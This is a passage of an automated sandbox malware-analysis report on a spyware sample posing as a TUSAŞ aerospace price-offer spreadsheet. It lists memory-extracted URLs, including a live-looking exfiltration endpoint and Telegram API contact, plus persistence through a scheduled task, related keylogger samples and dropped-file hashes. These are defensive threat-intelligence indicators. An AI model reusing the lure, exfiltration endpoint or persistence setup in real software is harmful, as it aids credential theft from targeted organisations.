https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3393608177.000000000437E000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3393608177.0000000004093000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3392833347.000000000434E000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3392833347.0000000004061000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org/q	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.2183125606.000000000427C000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000B.00000002.2231819209.00000000044ED000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3379471851.000000000042F000.00000040.00000400.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000003.00000002.2193534020.00000000047B6000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/	powershell.exe, 00000003.00000002.2199848529.00000000056C6000.00000004.00000800.00020000.00000000.sdmp	false	high
https://nuget.org/nuget.exe	powershell.exe, 00000003.00000002.2199848529.00000000056C6000.00000004.00000800.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstore?hl=enlB	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3385197213.0000000003202000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3384233023.00000000031D1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/8.46.123.189$	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3385197213.0000000003156000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3385197213.000000000312F000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3385197213.00000000030E9000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3384233023.0000000003127000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3384233023.00000000030FF000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3384233023.00000000030B9000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3385197213.0000000003156000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3385197213.000000000312F000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3385197213.00000000030BF000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3384233023.00000000030FF000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3384233023.000000000308F000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.2182151240.0000000003117000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2193534020.0000000004661000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3385197213.0000000003071000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000B.00000002.2226842794.0000000003387000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3384233023.0000000003041000.00000004.00000800.00020000.00000000.sdmp	false	high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3393608177.000000000437E000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3393608177.0000000004093000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3392833347.000000000434E000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3392833347.0000000004061000.00000004.00000800.00020000.00000000.sdmp	false	high
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.2183125606.000000000427C000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000B.00000002.2231819209.00000000044ED000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3379471851.000000000042F000.00000040.00000400.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.2183125606.000000000427C000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3385197213.00000000030BF000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000B.00000002.2231819209.00000000044ED000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3384233023.000000000308F000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3379471851.000000000042F000.00000040.00000400.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.48.1	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
132.226.247.73	checkip.dyndns.com	United States	16989	UTMEMUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1590703
Start date and time:	2025-01-14 14:13:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 40s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	20
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe renamed because original name is a hash value
Original Sample Name:	TEKLF STE - TUSA TRK HAVACILIK UZAY SANAY_xlsx.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@21/15@3/3
EGA Information:	Successful, ratio: 60%
HCA Information:	Successful, ratio: 100% Number of executed functions: 266 Number of non-executed functions: 18
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 2.23.242.162, 13.107.246.45, 20.12.23.50
Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, PID 5728 because it is empty
Execution Graph export aborted for target powershell.exe, PID 6184 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
08:13:57	API Interceptor	2451888x Sleep call for process: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe modified
08:13:59	API Interceptor	48x Sleep call for process: powershell.exe modified
08:14:02	API Interceptor	1585778x Sleep call for process: xSjByRHuwGV.exe modified
14:13:59	Task Scheduler	Run new task: xSjByRHuwGV path: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.48.1	ydJaT4b5N8.exe	Get hash	malicious	FormBook	Browse	www.vilakodsiy.sbs/vq3j/
	NWPZbNcRxL.exe	Get hash	malicious	FormBook	Browse	www.axis138ae.shop/j2vs/
	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	twirpx.org/administrator/index.php
	SN500, SN150 Spec.exe	Get hash	malicious	FormBook	Browse	www.antipromil.site/7ykh/
149.154.167.220	12.exe	Get hash	malicious	Unknown	Browse
	12.exe	Get hash	malicious	Unknown	Browse
	PI ITS15235.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	slime crypted.exe	Get hash	malicious	MassLogger RAT	Browse
	ElixirInjector.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	QUOTATION REQUIRED_Enatel s.r.l..bat.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	Remittance Advice.exe	Get hash	malicious	MassLogger RAT	Browse
	PDF-3093900299039 pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe	Get hash	malicious	Snake Keylogger	Browse
	https://ngk.ae/hurda.html?email=lara.sutton@southerntrust.hscni.net	Get hash	malicious	HTMLPhisher	Browse
132.226.247.73	RENH3RE2025QUOTE.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	rOrders.scr.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	QUOTATION#090125-ELITEMARINE.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	Order_list.scr.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	JWPRnfqs3n.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	14lVOjBoI2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	rlPy5vt1Dg.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	wZ6VEnOkie.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	tNXl4XhgmV.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	4AMVusDMPP.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
checkip.dyndns.com	MB263350411AE_1.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.130.0
	ABG Draft.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	158.101.44.242
	RENH3RE2025QUOTE.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	132.226.247.73
	PI ITS15235.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	tN8GsMV1le.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	slime crypted.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.130.0
	rOrders.scr.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	MB263350411AE.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.130.0
	QUOTATION REQUIRED_Enatel s.r.l..bat.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	Remittance Advice.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.130.0
reallyfreegeoip.org	MB263350411AE_1.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.16.1
	ABG Draft.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.64.1
	RENH3RE2025QUOTE.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.80.1
	PI ITS15235.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.16.1
	tN8GsMV1le.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.32.1
	slime crypted.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.48.1
	rOrders.scr.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.32.1
	MB263350411AE.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.112.1
	QUOTATION REQUIRED_Enatel s.r.l..bat.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	Remittance Advice.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.32.1
api.telegram.org	12.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	PI ITS15235.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	slime crypted.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	ElixirInjector.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	QUOTATION REQUIRED_Enatel s.r.l..bat.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Remittance Advice.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	PDF-3093900299039 pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	https://ngk.ae/hurda.html?email=lara.sutton@southerntrust.hscni.net	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	https://terrific-metal-countess.glitch.me/	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://biomed.acemlna.com/lt.php?x=3TZy~GE4J6XM5p79_du5VOds1H_TjdEjvPthjaTKJ3DP65RA_ky.0.Rv2Y2liNA~j-xAXHXFJFQNDb.y_ELGV.Fw3Hyoi8	Get hash	malicious	Unknown	Browse	104.17.202.31
	MB263350411AE_1.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.16.1
	VRO.exe	Get hash	malicious	Unknown	Browse	172.67.74.152
	mP8rzGD7fG.dll	Get hash	malicious	Unknown	Browse	104.26.13.205
	VRO.exe	Get hash	malicious	Unknown	Browse	104.26.12.205
	mP8rzGD7fG.dll	Get hash	malicious	Unknown	Browse	172.67.74.152
	iTVsz8WAu4.exe	Get hash	malicious	Unknown	Browse	172.67.74.152
	HLi4q5WAh3.exe	Get hash	malicious	Unknown	Browse	172.67.74.152
	e0691gXIKs.exe	Get hash	malicious	Unknown	Browse	104.26.12.205
	hJ1bl8p7dJ.exe	Get hash	malicious	Unknown	Browse	104.26.12.205
TELEGRAMRU	12.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	12.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	PI ITS15235.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	http://bu9.fysou.web.id/webs6/cx.aktifkn.fiturr	Get hash	malicious	Unknown	Browse	149.154.164.13
	http://bu9.fysou.web.id/webs6/aktrfn.fitur.pylter	Get hash	malicious	Unknown	Browse	149.154.164.13
	Handler.exe	Get hash	malicious	DanaBot, Vidar	Browse	149.154.167.99
	sysadmin.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	JUbmpeT.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	slime crypted.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	ElixirInjector.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
UTMEMUS	RENH3RE2025QUOTE.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	132.226.247.73
	PI ITS15235.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	tN8GsMV1le.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	rOrders.scr.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	QUOTATION REQUIRED_Enatel s.r.l..bat.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	PDF-3093900299039 pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	QUOTATION#090125-ELITEMARINE.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	132.226.247.73
	Order_list.scr.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	Receipt-2502-AJL2024.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	JWPRnfqs3n.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	MB263350411AE_1.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.48.1
	ABG Draft.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.48.1
	RENH3RE2025QUOTE.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.48.1
	PI ITS15235.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.48.1
	tN8GsMV1le.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.48.1
	slime crypted.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.48.1
	rOrders.scr.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.48.1
	MB263350411AE.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.48.1
	QUOTATION REQUIRED_Enatel s.r.l..bat.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.48.1
	Remittance Advice.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.48.1
3b5074b1b5d032e5620f69f9f700ff0e	VRO.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	mP8rzGD7fG.dll	Get hash	malicious	Unknown	Browse	149.154.167.220
	VRO.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	mP8rzGD7fG.dll	Get hash	malicious	Unknown	Browse	149.154.167.220
	iTVsz8WAu4.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	HLi4q5WAh3.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	e0691gXIKs.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	hJ1bl8p7dJ.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	Y4TyDwQzbE.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	DYv2ldz5xT.exe	Get hash	malicious	Unknown	Browse	149.154.167.220

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.log

Download File

Process:	C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\xSjByRHuwGV.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.380805901110357
Encrypted:	false
SSDEEP:	48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//8PUyus:lGLHyIFKL3IZ2KRH9Oug8s
MD5:	F9B7CF60C22DBE6B73266580FFD54629
SHA1:	05ED734C0A5EF2ECD025D4E39321ECDC96612623
SHA-256:	880A3240A482AB826198F84F548F4CB5B906E4A2D7399D19E3EF60916B8D2D89
SHA-512:	F55EFB17C1A45D594D165B9DC4FA2D1364B38AA2B0D1B3BAAE6E1E14B8F3BD77E3A28B7D89FA7F6BF3EEF3652434228B1A42BF9851F2CFBB6A7DCC0254AAAE38
Malicious:	false
Preview:	@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_awjudaub.skb.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eqguczlw.pck.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nsjdqk2t.cpl.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
